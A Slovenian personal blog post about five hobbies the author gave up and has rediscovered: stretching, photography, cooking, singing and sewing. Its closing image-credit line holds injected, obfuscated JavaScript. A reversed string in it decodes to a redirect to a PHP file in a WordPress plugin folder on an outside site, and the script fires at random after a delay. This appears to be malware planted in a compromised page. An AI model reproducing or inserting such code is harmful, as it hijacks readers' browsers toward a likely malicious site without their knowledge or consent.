Kaj sem nekoč rada počela

Zadnje čase spet odkrivam vedno več stvari, ki me resnično veselijo. To so stvari, ki sem jih opustila iz meni trenutno še neznanih razlogov. Zdaj sem jih spet našla in se jih z veseljem poprimem.

 1. Raztegovanje
  To se morda čudno sliši, a res mi je všeč občutek raztezanja mišic. To sem spoznala pri akrobatiki, ko sem iz treninga v trening postajala bolj gibčna. Dobro sem se počutila, ko sem lahko naredila špago ali predklon brez problema. Vmes sem to gibčnost zelo zanemarjala, zato sem postala telesno trda. Zdaj pa delam jogo, ki mi vsakič znova pomaga k cilju; gibljivost telesa.
 2. Fotografiranje
  Že od osnovne šole izvira ta ljubezen. Vedno sem videla potencialne, lepe slike. Nekaj časa sem tudi fotografirala za šolo in imela odprt profil na DeviantArtu, kamor sem nalagala svoje slike. Tekom časa sem izgubila to vnemo, ker nisem imela dobrega fotoaparata na telefonu, zrcalno-refleksnega pa nisem obvladala do te mere, da bi lahko v fotografiranju res uživala. Zdaj, ko sem spet dobila kvalitetnejši fotoaparat (telefon), sem spet začela fotografirati in zelo uživam v tem.
 3. Kuhanje
  Dejansko sem rada kuhala in ustvarjala s hrano, ko sem bila mlajša. Kasneje za to ni bilo preveč časa in podpore in se je vse skupaj porazgubilo. Zdaj pa vedno bolj čutim potrebo po tem. Čutim željo po peki, čutim željo po napredovanju in. Zanima me. Sicer je ta točka še v povojih, a začetek je korak naprej.
 4. Petje
  Kot otrok sem zelo rada pela. Hodila sem k pevskim zborom, s katerimi smo imeli nastope in pela sem z radostjo. Vmes sem izgubila samozavest glede svojega glasu in sem totalno zakrknila. Res nisem uspela spustiti glasu iz sebe. Zdaj pa imam sina, ki rad posluša pesmice in rad poje. Zbudil je v meni spet to strast in ne čudite s mi, če me slišite peti med sprehodom. Če bom imela priložnost in potrebo bom to naredila.
 5. Šivanje
  Vedno sem sanjala o lastnih oblačilih. Včasih sem ustvarjala pomanjšana oblačila, za lutke. Vmes sem se spremenila v nekoga, ki ni bil jaz in ta potreba se je porazgubila. Namesto unikatnih oblačil so prišle na vrsto tiste “normalne”, ki so bile v tistem trenutku popularne. Ob polnoletnosti pa sem končno spoznala spet sebe, zato sem zavrgla popularnost in raje bila to kar sem. Zdaj tudi sama zase urejam oblačila. Izdelujem si dodatke in vesela sem, da sem spet v stiku s to ljubeznijo.

Nenazadnje, vsi imamo neke strasti, ki smo jih tekom časa izgubili na poti. V mojem primeru je šlo za prilagajanje okolici, od katere pa nisem dobila nič, le še bolj izgubila. Zdaj, ko sem spet našla tisto, kar me veseli, je čas da grem ciljem nasproti. Čas, da si ustvarjam nove cilje, da rastem in zablestim v tem, kar sem.

Spomni se svojih starih stvari, ki si jih počel s strastjo. Bi mogoče katero spet vpeljal v svoje življenje? Katero?

Z Ljubeznijo;
(Ni)Si

Prikazana slika: $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/purpose?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash